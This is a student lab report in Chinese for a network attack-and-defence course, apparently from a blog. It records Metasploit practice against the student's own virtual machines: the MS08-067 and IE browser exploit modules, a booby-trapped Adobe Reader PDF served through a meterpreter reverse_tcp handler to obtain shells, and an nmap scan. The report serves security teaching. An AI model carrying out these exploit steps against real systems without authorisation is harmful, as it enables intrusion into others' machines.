• 20192412 202120222 《网络与系统攻防技术》实验六实验报告


    《网络与系统攻防技术》实验六 Metasploit攻击渗透实践

    实验内容

    一、本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1. 一个主动攻击实践,尽量使用最新的类似漏洞
    2. 一个针对浏览器的攻击,尽量使用最新的类似漏洞
    3. 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞
    4. 成功应用任何一个辅助模块

    实验过程

    任务一 一个主动攻击实践:MS08-067

    攻击机:kali-linux i386
    攻击机ip:192.168.10.144(NAT模式)
    靶机:windows 2000
    靶机ip:192.168.11.137(NAT模式)

    1. 使用口令"msfconsole",启动msf终端

    2. 使用口令"use exploit/windows/smb/ms08_067_netapi"选择模块并按照下图进行ip,端口配置

    3. 使用口令"set target 0"选定操作系统,"exploit"攻击获得权限

    任务二 针对浏览器的攻击:ms10_002&&ms14_046

    ms10_002

    攻击机:kali-linux i386
    攻击机ip:172.16.212.174(桥接模式)
    靶机:windows xp
    靶机ip:172.16.209.66(NAT模式,此ip为win10主机的ip)

    1. 使用口令"use exploit/windows/browser/ms10_002_aurora"选择模块并按照下图进行ip,uri配置

    2. "options"查看配置细节

    3. "exploit",获得URL,使用靶机访问URL

    1. kali端获得靶机shell,攻击成功

    ms14_046

    攻击机:kali-linux i386
    攻击机ip:172.16.212.174(桥接模式)
    靶机:windows xp
    靶机ip:172.16.213.55(桥接模式)

    1. 使用口令"use exploit/windows/browser/ms14_064_ole_code_execution"选择模块并按照下图进行相关配置

    2. "exploit",获得URL,使用靶机访问URL

    1. kali端获得靶机shell,攻击成功

    任务三 针对客户端的攻击:adobe reader 9

    攻击机:kali-linux i386
    攻击机ip:172.16.212.174(桥接模式)
    靶机:windows xp
    靶机ip:172.16.213.55(桥接模式)

    1. 使用口令"use windows/fileformat/adobe_cooltype_sing"选择模块,使用口令"options"查看配置情况

    2. 可以看到配置基本完成,我们只需要根据自己需要加上自己个性化的信息,如学号,姓名

    3. "exploit",并找到生成相应pdf文件

    4. 使用口令"use exploit/multi/handler"选择模块,设置ip和端口(ps:与之前生成pdf文件的ip和端口保持一致)

    1. 使用口令"set payload windows/meterpreter/reverse_tcp"设置负载,并"run"进入监听

    2. 将生成的pdf文件传输到靶机上,并运行,可以成功获得靶机shell

    任务四 成功应用任何一个辅助模块:nmap

    攻击机:kali-linux i386
    攻击机ip:172.16.212.174(桥接模式)
    靶机:windows xp
    靶机ip:172.16.213.55(桥接模式)

    1. 使用口令"show auxiliary",查看辅助功能

    2. "nmap","nmap -O -Pn 172.16.213.55"对靶机的操作系统进行扫描

    1. 成功获得靶机操作系统,windows xp

    问题及解决方案

    问题:

    1. 尝试了windows xp sp1,windows xp sp3,windows 2000,windows 7,windows 10 ,windows xp professional,很多模块存在,但攻击不成功
    2. 下载的adobe,wireshark版本不对,该漏洞被修复

    解决方案:

    1. 有的漏洞在靶机上运行了5,6遍,kali上才获得session,成功连接,还有的一直没反应
    2. 多下几个版本进行尝试,尽量用早一点的,多尝试几个应用,多花点时间

    学习感悟、思考等

    从信息收集开始,自己尝试用各种方法攻击靶机是一个不同的体验。过程很曲折,前前后后花了二十多个小时,基本都用在了装靶机,下操作系统,找软件。命令很简单,操作很方便,但是找到一个合适的攻击方式很不容易。要加强信息的收集能力,争取做到快准狠。

  • 相关阅读:
    C++11 中的 Defaulted 和 Deleted 函数
    php运行出现Call to undefined function curl_init()的解决方法
    Windows 8 IIS中配置PHP运行环境的方法
    中国天气预报数据API收集
    IIS 6中mimemap属性的默认设置
    使用APPCAN开发移动应用APP心得
    个人建了一个APPCAN移动前端开发交流QQ群258213194
    APPCAN MAS接口之AJAX
    JavaScript与DOM
    如何让网页在浏览器标题栏显示自己制作的图标ico
  • 原文地址:https://www.cnblogs.com/gkw2412/p/16273681.html
Copyright © 2020-2023  润新知